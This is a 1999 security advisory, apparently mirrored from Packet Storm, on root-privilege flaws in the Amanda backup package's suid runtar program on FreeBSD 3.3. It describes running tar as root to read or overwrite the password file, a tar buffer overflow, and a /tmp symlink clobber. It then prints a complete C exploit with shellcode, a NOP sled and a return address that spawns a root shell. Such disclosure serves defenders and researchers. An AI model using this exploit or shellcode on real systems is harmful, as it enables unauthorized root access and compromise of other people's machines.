Lucene search
+L

amanda.backup.txt

🗓️ 02 Nov 1999 00:00:00Reported by Brock TellierType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 34 Views

Amanda backup package has vulnerabilities allowing any user to gain root privileges on systems.

Code
`OVERVIEW:  
The Amanda backup package has a several vulnerabilities which  
will allow any user to gain root privs.  
  
BACKGROUND:  
My tests were done ONLY on FreeBSD 3.3-RELEASE, though this is almost  
certainly not the only vulnerable OS. A search for "amanda-2 and not  
freebsd" on altavista yields preliminary, unconfirmed data that some of  
the vulnerable OS's (based on packages that are included on install  
CD's, anyone can install Amanda to make themselves vulnerable) may be:  
RedHat ?.?, TurboLinux, PowerTools CD, SuSE 6.2 Confirmation on which  
OS's/tar's are vulnerable would be useful.  
  
DETAILS:  
  
Amanda's "runtar" program, suid root by default on FreeBSD 3.3, calls  
/usr/bin/tar and passes all args given to runtar to this program. Tar is  
  
thus run with root permissions and is vulnerable to all of the same  
attacks on suid programs that it would have if it were suid itself.  
  
Vuln #1 - run tar as root  
  
Since tar is run with root permissions, you are free to tar up any file  
you wish, including /etc/master.passwd. You may also untar any file you  
  
wish, to any location on the system, including /etc/master.passwd. This  
  
does not require any exploit kung-fu and may be done by supplying args  
to tar/runtar as if you were root.  
  
Vuln #1.1 - tar contains a buffer overflow  
  
Obtaining root via buffer overflow here is redundant, of course, but it  
illustrates the point that even if tar's capabilities weren't able to  
gain root  
privs, the buffer overflow would still allow you to do so. An overflow  
exists *IN TAR* which will allow any user to execute commands as root.  
Note that an overflow in tar isn't an immediate security flaw  
since it is never suid/sgid, but it goes to show that one should do  
security audits of all the programs one calls with user input. By  
passing  
a long string to runtar in the form "/usr/local/libexec/amanda/runtar  
cvf  
$400bytes:bah" we can execute our commands. FreeBSD exploit attached  
below.  
  
Vuln #2 - symlink problem  
  
Not quite as serious, but a concern nonetheless. When the amandad  
daemon  
is run, a bin-owned file called "amandad.debug" in /tmp. By creating  
a symlink from /tmp/amandad.debug to any other file, we will force  
amandad  
to clobber the contents with that of amandad's debug info. Note that  
amandad is not suid/sgid, but it is often run with root perms at startup  
  
or via scripts.  
  
WHO IS VULNERABLE:  
Anyone running a suid version of runtar should be suspicious. I've not  
tested any other O.S.'s except FreeBSD 3.3, which includes amanda 2.3.0  
and 2.4.1 as "additional packages" on the install CD and tar-1.11.2.  
  
  
EXPLOIT:  
  
/*  
* Amanda runtar exploit yields euid=0(root)  
* Actually overflows tar 1.11.2 (included in FreeBSD 3.3)  
* Tested on FreeBSD 3.3, modify shell/addr/dir for Amanda/tar on other  
* platforms  
*  
* Compile gcc -o amandax amandax.c  
* Run ./amandax <offset> <buflen>  
* keep buflen around 400, try positive and negative offsets  
*  
* Brock Tellier [email protected]  
*/  
  
  
#include <stdlib.h>  
#include <stdio.h>  
  
char fbsdshell[]= /* [email protected] */  
"\xeb\x35\x5e\x59\x33\xc0\x89\x46\xf5\x83\xc8\x07\x66\x89\x46\xf9"  
"\x8d\x1e\x89\x5e\x0b\x33\xd2\x52\x89\x56\x07\x89\x56\x0f\x8d\x46"  
"\x0b\x50\x8d\x06\x50\xb8\x7b\x56\x34\x12\x35\x40\x56\x34\x12\x51"  
"\x9a>:)(:<\xe8\xc6\xff\xff\xff/bin/sh";  
  
  
#define LEN 400  
#define NOP 0x90  
#define ALIGN 3  
#define OFFSET 0  
#define ADDR 0xbfbfdd90 /* fbsd 3.3 */  
  
int main(int argc, char *argv[]) {  
  
long int offset=OFFSET;  
  
int i;  
int buflen = LEN;  
long int addr = ADDR;  
char buf[LEN];  
  
if (argc > 1) offset = atoi(argv[1]);  
if (argc > 2) buflen = atoi(argv[2]);  
if (argc > 3) {  
fprintf(stderr, "Usage: %s <offset> <buflen>");  
exit(0);  
}  
  
fprintf(stderr, "Amanda runtar exploit for FreeBSD 3.3\n");  
fprintf(stderr, "Brock Tellier [email protected]\n");  
fprintf(stderr, "Using addr: 0x%x\t buflen: %d\t offset: %d\n",  
addr+offset, buflen, offset);  
  
memset(buf,NOP,buflen);  
memcpy(buf+100,fbsdshell,strlen(fbsdshell));  
for(i= 100 + strlen(fbsdshell)+ALIGN;i<buflen-4;i+=4)*(int  
*)&buf[i]=addr+offset;  
  
execl("/usr/local/libexec/amanda/runtar", "runtar","cvf", buf, ":bah",  
NULL);  
  
exit(0);  
}  
  
Brock Tellier  
UNIX Systems Administrator  
Chicago, IL, USA  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

02 Nov 1999 00:00Current
7.4High risk
Vulners AI Score7.4
34